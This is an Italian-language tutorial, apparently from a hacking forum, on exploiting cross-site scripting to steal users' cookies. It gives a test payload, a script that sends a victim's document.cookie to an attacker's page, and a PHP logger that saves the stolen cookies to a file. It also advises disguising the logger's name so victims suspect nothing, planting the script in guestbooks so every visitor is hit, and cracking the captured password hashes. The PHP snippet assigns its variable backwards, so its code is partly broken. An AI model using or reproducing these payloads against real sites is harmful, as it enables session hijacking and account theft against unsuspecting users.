Sicuramente ne avrete già sentito parlare,se ancora no,cercherò di farvi capire qualcosina in più su questo tipo di attacco.

Per incominciare XSS sta per Cross Site Scripting,e  d è un bug molto comune sui siti web,nonostante sia facilmente prevedibile.
Questo tipo di attacco consiste nell'esecuzione di un codice JavaScript da parte dell'utente.
Vediamo come sfruttare questi tipi di bug,e come trovarli,allora di solito si possono trovare in ogni parte del sito dove è possibile inviare qualcosa al server,come ad esempio nella ricerca di un file,od un articolo.Per capire se un sito è vulnerabile da questo attacco si attua un semplice codice,come per esempio:

<script>alert("Prova XSS")</script>

Se una volta inviato questo testo apparirà un MsgBox con scritto "Prova XSS" vuol dire che il sito è vulnerabile,e quindi possiamo passare alla parte vera e propria dell'attacco.

Come Sfruttare le XSS:

<script>window.location="www.vostrosito.com/rubacookie.php?c="+document.cookie</script>

con questo codice l'utente che eseguira questo codice o ne sarà vittima verrà reindirizzato dal browser sul sito www.vostrosito.com/cookie.php?c= e invierà i loro cookie grazie al document.cookie.
Ma se non salviamo i cookies che generosamente ci fornisce l'utente è inutile :D.
Per salvarli basta semplicemente mettere nel codice della pagina "rubacookie.php" il seguente codice:

<?php
$var = "
";
$_GET['data'] = $c;
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$c");
fwrite($fh, "$var");
fclose($fh);
?>

Con il seguente codice verrà salvato nell'account ftp un file di testo con i cookie dell'utente.
Naturalmente il file lo dovrete uppare su un vostro sito web,e cercate di non rinominarlo "rubacookie.php",perchè bisogna fare di tutto affinchè l'utente nn si accorga di nulla e pensi sia un errore del server.
Quando troverete salvati i cookies dell'utente non saranno direttamente Nick e Password del sito ma arriveranno cryptati con un algoritmo di solito md5,che dovrete decryptare voi.
Per ora è tutto spero di avervi chiarito un po le idee :D.

P.S:Questo attacco è molto utile se c'è ad esempio un GuestBook nel sito vulnerabile,che interagisce con l'homepage in modo che l'utente non debba fare nulla,e verrà redirectato appena accederà al sito.